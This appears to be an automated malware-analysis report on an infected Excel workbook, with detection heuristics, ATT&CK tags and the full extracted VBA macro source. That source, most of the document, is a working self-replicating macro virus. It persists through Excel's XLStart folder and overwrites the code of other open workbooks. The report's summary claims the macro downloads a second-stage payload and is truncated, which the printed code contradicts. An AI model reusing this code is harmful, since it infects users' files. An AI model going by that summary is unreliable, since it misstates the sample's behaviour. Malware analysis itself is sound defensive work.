MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV heuristic and high-severity Workbook_Open macro firing indicate malicious intent. The VBA code attempts to copy itself to a file named 'XLStart.xls' in the Excel startup path, which is a common persistence mechanism. The script's primary function appears to be downloading and executing a second-stage payload, though the full details are truncated.
Heuristics 3
- ClamAV: Xls.Trojan.Brep-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Brep-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3352 bytes |

SHA-256: d1ce3cb79721e62f776a40541d7a8f2f9d523530fe1100728a0ec56507b4da12
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'TripperB SIFA
Private Sub Workbook_Open()
    Dim nbc$
    Application.OnSheetActivate = ""
    If Dir(Application.StartupPath & "\" & "XLStart.xls") = "XLStart.xls" Then
        Call SIFA
    Else
        Application.ScreenUpdating = False
        ThisWorkbook.Modules.Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        nbc$ = ActiveWorkbook.Name
        ActiveWorkbook.Sheets(1).Protect DrawingObjects:=True, Contents:=True, Scenarios:=True
        ActiveWindow.Visible = False
        Call SIFA
        Workbooks(nbc$).SaveAs FileName:=Application.StartupPath & "/" & "XLStart.xls", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
        Workbooks("XLStart.xls").Saved = True
        Application.ScreenUpdating = True
    End If
End Sub
Sub SIFA()
    Dim vbp
    Dim col&
    Dim sol$
    On Error GoTo Fiu
    Application.OnSheetActivate = ""
    Application.EnableEvents = False
    col& = Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines
    sol$ = Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.Lines(1, col&)
    For Each vbp In Application.VBE.VBProjects
        Select Case vbp.Protection
            Case False
                col& = vbp.VBComponents("ThisWorkbook").CodeModule.CountOfLines
                If vbp.VBComponents("ThisWorkbook").CodeModule.Find(" 'TripperB SIFA", 1, 1, col&, 1) Then
                Else
                    With vbp
                        .VBComponents("ThisWorkbook").CodeModule.DeleteLines 1, col&
                        .VBComponents("ThisWorkbook").CodeModule.AddFromString (sol$)
                    End With
                End If
            Case Else
        End Select
    Next
    Application.EnableEvents = True
    Application.OnWindow = "ThisWorkbook.SIFA"
Fiu:
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```